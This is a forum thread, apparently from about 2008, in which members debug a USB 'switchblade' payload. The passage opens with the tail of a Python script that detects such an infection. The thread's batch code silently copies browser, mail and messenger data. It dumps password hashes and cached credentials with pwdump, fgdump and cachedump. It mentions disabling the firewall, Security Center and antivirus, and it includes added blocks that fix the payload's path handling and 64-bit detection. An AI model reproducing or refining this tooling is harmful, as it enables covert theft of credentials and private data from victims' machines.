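        if "winlogon.exe" in lower and not path.lower().endswith("\\system32"):
            findings.append(("masquerade", f"winlogon.exe outside system32: {path}"))
    return findings


def check_run_values(run_values: Dict[str, str]) -> List[Finding]:
    """run_values maps Run value names to their commands (reg query output)."""
    return [("autorun", f"Run value {name!r} -> {cmd}") for name, cmd in run_values.items()
            if name == RUN_VALUE_NAME or any(d in cmd for d in DROP_DIRS)]


def check_startup_shortcuts(paths: List[str]) -> List[Finding]:
    """The payload names its Startup-folder shortcut ' .lnk' (a lone space)."""
    return [("autorun", f"blank-named startup shortcut {p}") for p in paths if _leaf(p) == " .lnk"]


def check_services(services: List[Dict[str, str]]) -> List[Finding]:
    """services: dicts with name, display and binpath, as reported by `sc qc`."""
    return [("service", f"VNC posing as {s['display']!r}: {s['binpath']}") for s in services
            if s["name"].lower() == "winvnc" or s["display"] == VNC_DISPLAY_NAME
            or "winvnc.exe" in s["binpath"].lower()]


def check_at_jobs(jobs: List[Tuple[str, str, str]]) -> List[Finding]:
    """jobs: (time, days, command) triples as listed by `at`; the payload mails logs at 17:00."""
    return [("schedule", f"{t} {d}: {c}") for t, d, c in jobs
            if _leaf(c).lower() in ("recover.bat", "send.bat") or any(x in c for x in DROP_DIRS)]


def triage(host: dict) -> List[Finding]:
    """Run every check over one host inventory and return all findings."""
    return (check_dirs(host["dirs"]) + check_run_values(host["run"])
            + check_startup_shortcuts(host["startup"]) + check_services(host["services"])
            + check_at_jobs(host["at"]))


# Constructed inventory of a hypothetical infected XP host; payload artifacts are mixed
# with benign entries (a hotfix folder, a vendor Run value, the Spooler service) that
# must not be flagged.
SAMPLE_HOST = {
    "dirs": {
        r"C:\WINDOWS\$NtUninstallKB931552$": ["winlogon.exe", "rar.exe", "Recover.bat", "Stunnle.cfg"],
        r"C:\WINDOWS\$NtUninstallKB000001$": ["spuninst", "shell32.dll"],
        r"C:\Documents and Settings\bob\Application Data\sbs": ["sbs.exe", "send.bat", "stunnel.conf"],
        r"C:\WINDOWS\system32": ["winlogon.exe", "cmd.exe"],
    },
    "run": {"USBMedia": r"C:\WINDOWS\$NtUninstallKB931337$\sbs.lnk",
            "SoundMAX": r"C:\Program Files\Analog Devices\SoundMAX\SMax4PNP.exe"},
    "startup": [r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ .lnk",
                r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup\Reader.lnk"],
    "services": [{"name": "WinVNC", "display": "Domain Client Service",
                  "binpath": r"C:\WINDOWS\winvnc.exe -service"},
                 {"name": "Spooler", "display": "Print Spooler",
                  "binpath": r"C:\WINDOWS\system32\spoolsv.exe"}],
    "at": [("17:00", "M,T,W,Th,F", r"C:\WINDOWS\$NtUninstallKB931552$\Recover.bat")],
}

if __name__ == "__main__":
    for category, detail in triage(SAMPLE_HOST):
        print(f"[{category}] {detail}")
```

The payload also runs `net stop "security center"` and `netsh firewall set opmode disable`, so a stopped Security Center service or a disabled firewall profile on an XP box is a further sign worth checking alongside these findings.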
  2. Oh btw, I need someone with Vista and someone with Vista64 to check their directories and see if there are differences we can IF EXISTS off of. Things like Program Files, Windows, et al. I have no access to a Vista or Vista64 machine right now, so I can't find out for myself. Thanks!!!
  3. Ok, just went through a lot of the slurp stuff... XP x64 has a different "Program Files" directory, so I had to add:

IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)"

If you have "C:\Program Files (x86)" you have XP x64. If you have "C:\Program Files" you have either win2k or non-x64 xp. REVELATION!!!!! I just found out that win2k doesn't have a C:\windows directory, it has C:\winnt. XP does have C:\Windows. So now we can tell the three apart :) What follows is configured for what I found with xp x64... I'll be checking the directory changes vs xp and win2k when I can and I'll make separate blocks to handle the differences I find.

IF NOT EXIST %config%\Slurp1.cfg GOTO SkipSlurp1 IF EXIST "C:\Program Files" SET progfiles="C:\Program Files" IF EXIST "C:\Program Files (x86)" SET progfiles="C:\Program Files (x86)" :: MSN Received Files and chatlogs mkdir %logdir%\Slurp_Data\MSN\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Received Files\*" "%logdir%\Slurp_Data\MSN\*" /i /o :: Skype Received Files mkdir %logdir%\Slurp_Data\SkypeReceivedFiles\ fc.exe "C:\Documents and Settings\%username%\My Documents\My Skype Received Files\*" "%logdir%\Slurp_Data\SkypeReceivedFiles\*" /i /o :: Skype Contacts mkdir %logdir%\Slurp_Data\SkypeContacts\ fc.exe "C:\Documents and Settings\%username%\Application Data\Skype\*" "%logdir%\Slurp_Data\SkypeContacts\*" /i /o :: FireFox Data mkdir %logdir%\Slurp_Data\FireFox\ xcopy "C:\Documents and Settings\%username%\Application Data\Mozilla\Firefox\Profiles\*" "%logdir%\Slurp_Data\FireFox\" /s /c /q /r /h /y :: ThunderBird Data mkdir %logdir%\Slurp_Data\ThunderBird\ fc.exe "C:\Documents and Settings\%username%\Application Data\Thunderbird\Profiles\*" "%logdir%\Slurp_Data\ThunderBird\*" /i /o :: Internet Explorer Data mkdir %logdir%\Slurp_Data\IExplorer\ xcopy "C:\Documents and Settings\%username%\Application Data\Microsoft\Address Book\*.wab" 
"%logdir%\Slurp_Data\IExplorer\" /s /c /q /r /h /y fc.exe "C:\Documents and Settings\%username%\Favorites\*" "%logdir%\Slurp_Data\IExplorer\*" /i /o :: Outlook & Outlook Express Data mkdir %logdir%%\Slurp_Data\Outlook\ xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Microsoft\Outlook\*" "%logdir%\Slurp_Data\Outlook\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\local Settings\Application Data\Identities\*" %logdir%\Slurp_Data\Outlook /s/c/q/r/h/y :: NetScape Data mkdir %logdir%\Slurp_Data\NetScape\ xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.db" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*.dat" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Netscape\NSB\Profiles\*bookmarks.html" "%logdir%\Slurp_Data\NetScape\" /s /c /q /r /h /y :: Opera Data mkdir %logdir%\Slurp_Data\Opera\ xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\profile\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.dat" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\Opera\Opera\mail\*.ini" "%logdir%\Slurp_Data\Opera\" /s /c /q /r /h /y :: Trilian Data mkdir %logdir%\Slurp_Data\Trilian\ xcopy "%progfiles%\Trillian\users\default\logs\*.log" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y fc.exe "%progfiles%\Trillian\users\default\downloads\*" "%logdir%\Slurp_Data\Trilian\*" /i /o xcopy "%progfiles%\Trillian\users\default\*.ini" "%logdir%\Slurp_Data\Trilian\" /s /c /q /r /h /y :: Yahoo Messenger Data mkdir %logdir%\Slurp_Data\Yahoo.M\ xcopy "%progfiles%\Yahoo!\Messenger\Profiles\*" "%logdir%\Slurp_Data\Yahoo.M\" /s /c /q /r /h /y :: Miranda IM Data mkdir %logdir%\Slurp_Data\Miranda\ xcopy 
"%progfiles%\Miranda IM\*.dat" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y xcopy "%progfiles%\Miranda IM\*.bmp" "%logdir%\Slurp_Data\Miranda\" /s /c /q /r /h /y :: Gaim Data mkdir %logdir%\Slurp_Data\Gaim\ xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.txt" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y xcopy "C:\Documents and Settings\%username%\Application Data\.gaim\*.xml" "%logdir%\Slurp_Data\Gaim\" /s /c /q /r /h /y :: ICQ Lite mkdir %logdir%\Slurp_Data\ICQ\ fc.exe "C:\Documents and Settings\%username%\My Documents\ICQ Lite\*" "%logdir%\Slurp_Data\ICQ\*" /i /o IF EXIST %config%\Slurp2.cfg GOTO StartSlurp2 REN %logdir%\Slurp_Data %computername%-SlurpData :SkipSlurp1 btw, because I don't have all these programs installed on all three operating systems, could y'all check what you have against the paths in the slurp code above and let us know if we need to change anything??? Thanks!!!
  4. I'm presently going through the slurp stuff. Installable stuff is next on the hit parade.
  5. Concerning things working and not working....
[External IP]: worked on win2k & xp x64, didn't on xp
[Dump Wifi Hex]: No surprise here. I'm not running any of my machines on a wifi network.
[Dump Network PW]: Not sure what this is supposed to report. It's not working on any of my machines.
[Dump Mail PW]: Worked on win2k, didn't on xp or xp x64
[Dump IE PW]: Worked on win2k & xp, didn't on xp x64
[Dump Messenger PW]: Worked on ICQ installed on win2k, didn't catch YIM on xp x64 (don't have any other message services installed)
[Dump Updates-List]: works on win2k & xp, didn't work on xp x64
[Network Services]: worked on xp & xp x64, b option not present on win2k, so you get a usage dump. works on win2k if you delete the b option.
and finally...
[Dump Cache]: Isn't working on any of the three. I get errors on win2k & xp x64, and xp seems to work, but doesn't report anything interesting...
  6. DOH!!!!! Typing "Echo %os%" at a dos prompt on win2k, XP, and XP x64 all return "Windows_NT". So much for my solution for the pwdump fix. Anybody know a better way to detect which OS you're running??? The good news is the fgdump solution I posted works on all three. Therefore, I'm disabling pwdump and running with fgdump. and 403f0rb1dd3n, your additions look good :)
  7. Ok... Here we go...

Took out the extra /'s after the :'s in here:

:: Finds the location of the flash partition and sets master variable.
IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z:
IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound
IF EXIST y:\CONFIG\Drive_Location.cfg SET flshdrv=y:
IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound
IF EXIST x:\CONFIG\Drive_Location.cfg SET flshdrv=x:

(just showing a few, I took all of them out down to b:)

Changed set variables to look like:

:: Sets Variables and paths to clean up pathnames later on
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%"
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\")
SET config="%flshdrv%\CONFIG\"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\")
SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg"
SET U3="%cd%"

Changed pwdump and fgdump to look like:

IF NOT EXIST %config%\Dump_SAM_PWDUMP.cfg GOTO SkipPWDUMP
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
IF %os% == Windows_NT GOTO PWD1
.\pwdump 127.0.0.1 >> %log% 2>&1
GOTO SkipPWDUMP
:PWD1
.\pwdump -x 127.0.0.1 >> %log% 2>&1
:SkipPWDUMP

IF NOT EXIST %config%\Dump_SAM_FGDUMP.cfg GOTO SkipFGDUMP
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CD /D %logdir% >> %log% 2>&1
%U3%\fgdump.exe -vv -c >> %log% 2>&1
CD /D %U3% >> %log% 2>&1
ECHO. >> %log% 2>&1
ECHO -----Hashes----- >> %log% 2>&1
ECHO. >> %log% 2>&1
COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\*.log >> %log% 2>&1
DEL /f /q %logdir%\*.fgdump-log >> %log% 2>&1
DEL /f /q %logdir%\127.0.0.1* >> %log% 2>&1
:SkipFGDUMP

That's about it for now. AVKILL is still detected by avast. I disable avast and the payload runs silently on my x64 machine.

There are still a few things that don't report output. I'm going to look into those next:

-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Wifi Hex] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Network PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Mail PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump IE PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Messenger PW] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------
+----------------------------------+
+ [Dump Updates-List] +
+----------------------------------+
-----------------------------------------------------------------------------------------------------------------------------

I'll check what doesn't work on xp and win2k first. Probably won't be able to report on it until tomorrow.
  8. ok....

IF EXIST b:\CONFIG\Drive_Location.cfg SET flshdrv=b:\
IF EXIST %flshdrv%\CONFIG\Drive_Location.cfg GOTO FlshDrvFound

makes %flshdrv% = b:\

:: Sets Variables and paths to clean up pathnames later on
IF NOT EXIST %flshdrv%\LOGS\%computername% MD %flshdrv%\LOGS\%computername%
SET logdir="%flshdrv%\LOGS\%computername%
SET log="%flshdrv%\LOGS\%computername%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log"
SET tmplog="%flshdrv%\LOGS\%computername%\%computername%_TEMP.log"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET progdir="%flshdrv%\SYSTEM\") ELSE (SET progdir=".\")
SET config="%flshdrv%\CONFIG\"
IF NOT EXIST "%flshdrv%\CONFIG\U3_Drive.cfg" (SET installdir="%flshdrv%\SYSTEM\INSTALL\") ELSE (SET installdir=".\INSTALL\")
SET /p eipurl=<"%flshdrv%\CONFIG\External_IP.cfg"
SET U3="%cd%\SYSTEM"

every occurrence of %flshdrv% in that has a \ after it. We need to delete the \ from either the drive detect section or the Set Variables part. I'd say change it in the drive detect part. That should fix the \\ faults.

%logdir% is pointing to the cd partition, which is all wrong. fixing the \\ may fix that as well. Going to check.

< edit > Just noticed the missing " on the end of the set logdir line. Don't know if that's a problem yet
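Posts 7 and 8 above chase two path problems at once: a drive-detect value that ends in a backslash (so every "%flshdrv%\..." becomes "x:\\..."), and variables that carry their quotes inside the value. The block below is an added example written for this thread, not the Leapos start.bat and not tested against the payload. It assumes the same layout the posts describe (\CONFIG\Drive_Location.cfg on the flash partition, \CONFIG\U3_Drive.cfg present on a U3 stick, the script already CDed into \SYSTEM, and %Year% through %Second% set earlier in start.bat) and shows the convention that keeps the \\ and the stray quotes from appearing: store paths bare, quote them only where they are used, and write what was resolved into the log before any tool runs.

```batch
@ECHO OFF
:: Added example for this thread, not the Leapos start.bat. Assumes the
:: layout the posts describe: \CONFIG\Drive_Location.cfg on the flash
:: partition, \CONFIG\U3_Drive.cfg present on a U3 stick, the script
:: already CDed into \SYSTEM, and %Year%..%Second% set earlier.

:: --- Find the flash partition: one loop instead of one IF per letter.
:: Highest letter wins, same order as the original chain. The value is
:: "x:" with no trailing backslash, so "%flshdrv%\LOGS" can never become
:: "x:\\LOGS". IF DEFINED is evaluated at run time, so no delayed expansion
:: is needed to stop after the first hit.
SET flshdrv=
FOR %%d IN (z y x w v u t s r q p o n m l k j i h g f e d c b) DO (
    IF NOT DEFINED flshdrv IF EXIST %%d:\CONFIG\Drive_Location.cfg SET flshdrv=%%d:
)
IF NOT DEFINED flshdrv (
    ECHO Drive_Location.cfg not found on any drive, giving up.
    EXIT /B 1
)

:: --- Paths are stored WITHOUT quotes and quoted at the point of use.
:: Storing the quotes inside the variable (SET logdir="x:\LOGS\PC") means
:: %logdir%\Slurp_Data expands to "x:\LOGS\PC"\Slurp_Data, which external
:: tools will not accept, and a missing closing quote breaks every later line.
SET config=%flshdrv%\CONFIG
SET logdir=%flshdrv%\LOGS\%computername%
SET log=%logdir%\%computername%-[%Year%%Month%%Day%-%Hour%%Minute%%Second%].log
SET tmplog=%logdir%\%computername%_TEMP.log
IF NOT EXIST "%logdir%" MD "%logdir%"

:: U3 build: the tools sit next to this script (we are already in \SYSTEM).
:: Non-U3 build: the tools sit in \SYSTEM on the flash partition itself.
IF EXIST "%config%\U3_Drive.cfg" (
    SET progdir=%CD%
) ELSE (
    SET progdir=%flshdrv%\SYSTEM
)
SET installdir=%progdir%\INSTALL
SET U3=%CD%
SET /P eipurl=<"%config%\External_IP.cfg"

:: --- Self-check: record what was resolved and flag a double backslash,
:: the symptom seen in the thread. The space before >> matters: a value
:: ending in a digit followed directly by >> would be read as a redirect.
ECHO flshdrv=%flshdrv% >> "%log%"
ECHO logdir=%logdir% >> "%log%"
ECHO progdir=%progdir% >> "%log%"
ECHO "%log%" | FIND "\\" >NUL && ECHO WARNING: double backslash in %log%

:: --- Point of use: quote here. fgdump writes 127.0.0.1.pwdump into the
:: current directory, so move into the log directory for the run and
:: come straight back afterwards.
PUSHD "%logdir%" || EXIT /B 1
"%progdir%\fgdump.exe" -vv -c >> "%log%" 2>&1
IF EXIST "%logdir%\127.0.0.1.pwdump" TYPE "%logdir%\127.0.0.1.pwdump" >> "%log%"
POPD
```

The three ECHO lines are the cheap version of the "CD >> %log%" probes used in posts 9 and 13: if progdir shows up as M:\SYSTEM\SYSTEM or the log path contains \\, the problem is in the variable setup and not in the tool being called.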
  9. Tried changing directories again...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CD >> %log% 2>&1
ECHO %u3% >> %log% 2>&1
ECHO %logdir% >> %log% 2>&1
ECHO %log% >> %log% 2>&1
CD /D %logdir% >> %log% 2>&1
CD >> %log% 2>&1
%U3%\fgdump.exe -vv -c >> %log% 2>&1
CD >> %log% 2>&1
CD /D %U3% >> %log% 2>&1
CD >> %log% 2>&1

Yielded this:

+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
M:\SYSTEM
"M:\SYSTEM\SYSTEM"
"n:\\LOGS\MYPC\MYPC-[20080921-135445].log"
M:\SYSTEM
The system cannot find the path specified.
M:\SYSTEM
The system cannot find the path specified.
M:\SYSTEM

%u3% is reported out as M:\system, which is correct. %logdir% is reported as M:\system\system??? %log% has a double \??? small wonder I'm having trouble... back to editing.
  10. Hey.... This worked on my x64 box....

IF NOT EXIST %config%\Dump_SAM_PWDUMP.cfg GOTO SkipPWDUMP
ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM PWDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
IF %os% == Windows_NT GOTO PWD1
.\pwdump 127.0.0.1 >> %log% 2>&1
GOTO SkipPWDUMP
:PWD1
.\pwdump -x 127.0.0.1 >> %log% 2>&1
:SkipPWDUMP

Still having trouble with fgdump changing directories though. And AVKILL is detected by avast.

For the record, I've been concentrating on the switchblade stuff. I haven't even looked at the installable stuff yet. (hacksaw, keylogger, et al.) I just leave them disabled for now. Once we get all this hammered out I'll dig into those.

< edit > the os check didn't help on my XP or my win2K boxes... checking some more...
  11. http://technet.microsoft.com/en-us/library/bb490982.aspx Ok, now I see why that one line only had a single > rather than two of them... My bad.
  12. Found this: http://technet.microsoft.com/en-us/library/bb490954.aspx the %os% variable is looking interesting... XP x64 returns Windows_NT
  13. Tried changing directories...

ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
CD >> %log% 2>&1
CD /D %logdir% >> %log% 2>&1
CD >> %log% 2>&1
%U3%\fgdump.exe -vv -c >> %log% 2>&1
CD >> %log% 2>&1
CD /D %U3% >> %log% 2>&1
CD >> %log% 2>&1
ECHO. >> %log% 2>&1
ECHO -----Hashes----- >> %log% 2>&1
ECHO. >> %log% 2>&1
COPY %log%+%logdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %logdir%\127.0.0.1* >> %log% 2>&1
DEL /f /q %logdir%\*.log >> %log% 2>&1
DEL /f /q %logdir%\*.fgdump-log >> %log% 2>&1

Yielded this:

+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
M:\SYSTEM
M:\SYSTEM
The system cannot find the path specified.
M:\SYSTEM
The system cannot find the path specified.
M:\SYSTEM

-----Hashes-----

The "CD >> %log% 2>&1" lines are in there to tell the log file what directory I'm in. They resulted in M:\system every time. So my "CD /D %logdir% >> %log% 2>&1" didn't actually do anything. < sigh > It's late and I'm tired... More tomorrow.
  14. Ok, running this:

ECHO +----------------------------------+ >> %log% 2>&1
ECHO + [Dump SAM FGDUMP] + >> %log% 2>&1
ECHO +----------------------------------+ >> %log% 2>&1
.\fgdump.exe -vv -c >> %log% 2>&1
ECHO. >> %log% 2>&1
ECHO -----Hashes----- >> %log% 2>&1
ECHO. >> %log% 2>&1
COPY %log%+%progdir%\127.0.0.1.pwdump %log% >> NUL
DEL /f /q %progdir%\127.0.0.1* >> %log% 2>&1
DEL /f /q %progdir%\*.log >> %log% 2>&1
DEL /f /q %progdir%\*.fgdump-log >> %log% 2>&1

Yielded this:

+----------------------------------+
+ [Dump SAM FGDUMP] +
+----------------------------------+
fgDump 2.1.0 - fizzgig and the mighty group at foofus.net
Written to make j0m0kun's life just a bit easier
Copyright (C) 2008 fizzgig and foofus.net

fgdump comes with ABSOLUTELY NO WARRANTY!
This is free software, and you are welcome to redistribute it
under certain conditions; see the COPYING and README files for
more information.

Error opening output log file 2008-09-20-02-30-20.fgdump-log, disabling further log writing. Error code returned was 5
--- Session ID: 2008-09-20-02-30-20 ---
Error opening output log file 2008-09-20-02-30-20.fgdump-log, disabling further log writing. Error code returned was 5
>> A new worker thread has been created with the ID: 00000e78 <<
Starting dump on 127.0.0.1
Error opening failed output log file 2008-09-20-02-30-20.failed, disabling further log writing. Error code returned was 5

** Beginning local dump **
INFO: skipping cachedump on 127.0.0.1 because 127.0.0.1.cachedump exists or I was told to skip cache dumps
INFO: skipping dump of protected storage secrets on 127.0.0.1 because 127.0.0.1.lsadump exists or I was told to skip LSA dumps
Skipping impersonation (no user provided)
OS (127.0.0.1): Microsoft Windows 2003 Professional Service Pack 2 (Build 3790) (64-bit)
Failed to dump passwords: This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
Terminating thread 00000e78 (lpszServer is NULL)

-----Summary-----

Failed servers:
NONE

Successful servers:
127.0.0.1

Total failed: 0
Total successful: 1

-----Hashes-----

Could Not Find M:\SYSTEM\127.0.0.1*
Could Not Find M:\SYSTEM\*.log
Could Not Find M:\SYSTEM\*.fgdump-log

It appears that it's attempting to create the log files on the cd partition. Going to try specifying an output file.
  15. Newer versions of cachedump can be found here: http://no-spam-here.com/cachedump/ v1.3 still failed on my x64 machine :(
  16. fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]

where Username and Password have administrator credentials

-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or stop antivirus, even if it is present

There's fgdump's usage information. The payload has the most recent version. If you type fgdump -? you get a slightly different usage line:

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]

The "[-O 32|64]" being the important part... From http://swamp.foofus.net/fizzgig/fgdump/default.htm:

# Better 32/64 bit detection. This is not as easy as it sounds, at least not remotely! If someone has a sure-fire way for 100% reliably detecting the target OS, please let me know. In the mean time, if fgdump is unsure, it will report it and default to 32-bit.
# The -O [32|64] flag will manually override the target OS architecture. So, for example if fgdump is reporting a host as 32-bit and you KNOW it is 64-bit, you can use -O 64 (or vice-versa, of course). Note that this flag will apply to ALL hosts you are dumping! You might want to single out any hosts you need to override.

So it tries to autodetect, and if it fails it assumes x32. (bad on my x64 machine)

We also have the current version of pwdump. The docs say we have to set -x for x64 machines:

You MUST use -x if your target is a 64-bit OS. It DOES NOT MATTER what type of OS you are running FROM, only what your TARGET is! pwdump.exe itself is a 32-bit executable, and runs the same from any OS. The service and DLL are different depending on 32/64-bit.

I tried manually executing "pwdump -x 127.0.0.1" in a command prompt window and it worked fine.

On the Win2K machine, cache dump yielded:

+----------------------------------+
+ [Dump Cache] +
+----------------------------------+
Service not found. Installing CacheDump Service (E:\SYSTEM\CACHEDUMP.EXE -s)
CacheDump service successfully installed.
Service started.
Service currently active. Stopping service...
Service successfully removed.

and nothing more. (apparently nothing cached there)

On my normal XP machine I got:

+----------------------------------+
+ [Dump Cache] +
+----------------------------------+
Service not found. Installing CacheDump Service (G:\SYSTEM\CACHEDUMP.EXE -s)
CacheDump service successfully installed.
Service started.
Service successfully removed.

So again, nothing cached.

On my x64 machine I got:

+----------------------------------+
+ [Dump Cache] +
+----------------------------------+
Service not found. Installing CacheDump Service (M:\SYSTEM\CACHEDUMP.EXE -s)
CacheDump service successfully installed.
Service started.
ERROR Failed to open key SECURITY\Cache in RegOpenKeyEx. Is service running as SYSTEM ? Do you ever log on domain ? (code 0)
Service currently active. Stopping service...
ControlService failed to STOP the service. Retry in 2 sec
Service successfully removed.

- Hmmm... didn't like that. Manually executing in a dos window it says it's version 1.0 and only lists -v, -vv, & -K as options. Going off to do some research...
  17. Concerning network services....

I ran the payload on a Win 2K box and got:

+----------------------------------+
+ [Network Services] +
+----------------------------------+

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

  -a            Displays all connections and listening ports.
  -e            Displays Ethernet statistics. This may be combined with the -s option.
  -n            Displays addresses and port numbers in numerical form.
  -p proto      Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
  -r            Displays the routing table.
  -s            Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.
  interval      Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

Notice it doesn't list a b option.

I think the OS version detection would be a great idea. PWdump and FGdump are the ones that seem to have the most trouble with x64. (it crashed when running on Win2K, too) I'm going to dig into their docs next.
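Posts 6, 16 and 17 above all land on the same gap: %OS% is "Windows_NT" on 2000, XP and XP x64 alike, pwdump needs -x and fgdump wants -O 64 whenever the target is 64-bit, and netstat's b switch does not exist on Windows 2000. The block below is an added example written for this thread, not Leapos code and not run against the payload. It does the detection once, from VER and the processor-architecture variables, and derives the three option sets from it. It assumes pwdump.exe and fgdump.exe are in the current directory and that %log% is already set, as in start.bat; the netstat switches other than b are an assumption, since the thread never shows the payload's exact netstat line.

```batch
@ECHO OFF
:: Added example for this thread, not part of the Leapos payload.
:: %OS% is "Windows_NT" on 2000, XP and XP x64 alike, so it cannot choose
:: the pwdump/fgdump flags. Parse VER for the kernel version and use the
:: processor-architecture variables for the 32/64-bit decision.
:: Assumes pwdump.exe and fgdump.exe in the current directory and %log%
:: already set, as in start.bat.

:: --- Kernel version from VER. VER prints a blank line first (FOR /F
:: skips it) and then, for example:
::   Windows 2000  -> Microsoft Windows 2000 [Version 5.00.2195]
::   Windows XP    -> Microsoft Windows XP [Version 5.1.2600]
::   XP x64 / 2003 -> Microsoft Windows [Version 5.2.3790]
:: Token 2 between [ and ] is "Version 5.1.2600"; splitting that on
:: "." and " " gives major and minor regardless of the product name.
SET winver=
FOR /F "tokens=2 delims=[]" %%v IN ('VER') DO SET winver=%%v
FOR /F "tokens=2,3 delims=. " %%a IN ("%winver%") DO (
    SET vermajor=%%a
    SET verminor=%%b
)
SET /A vernum=%vermajor%*100+%verminor%

:: --- Architecture. A 32-bit cmd.exe running under WOW64 (which is what
:: you get when a 32-bit process, such as a launcher, starts the script on
:: x64) reports x86 in PROCESSOR_ARCHITECTURE and the real machine type in
:: PROCESSOR_ARCHITEW6432, so look at both.
SET arch=%PROCESSOR_ARCHITECTURE%
IF DEFINED PROCESSOR_ARCHITEW6432 SET arch=%PROCESSOR_ARCHITEW6432%

:: --- Flags the tools' own docs call for (quoted in post 16):
::   pwdump: -x is mandatory when the TARGET is 64-bit.
::   fgdump: -O 64 / -O 32 overrides its auto-detection, which defaults
::           to 32-bit when unsure.
SET pwdumpopts=
SET fgdumpopts=-vv -c -O 32
IF /I "%arch%"=="AMD64" (
    SET pwdumpopts=-x
    SET fgdumpopts=-vv -c -O 64
)

:: --- netstat -b (show the owning executable) is not in Windows 2000;
:: on 5.0 netstat just prints its usage text, as post 17 shows. Gate it
:: on 5.1 or later. "-an" is an assumption about the payload's other
:: switches; substitute whatever start.bat actually uses.
SET netstatopts=-an
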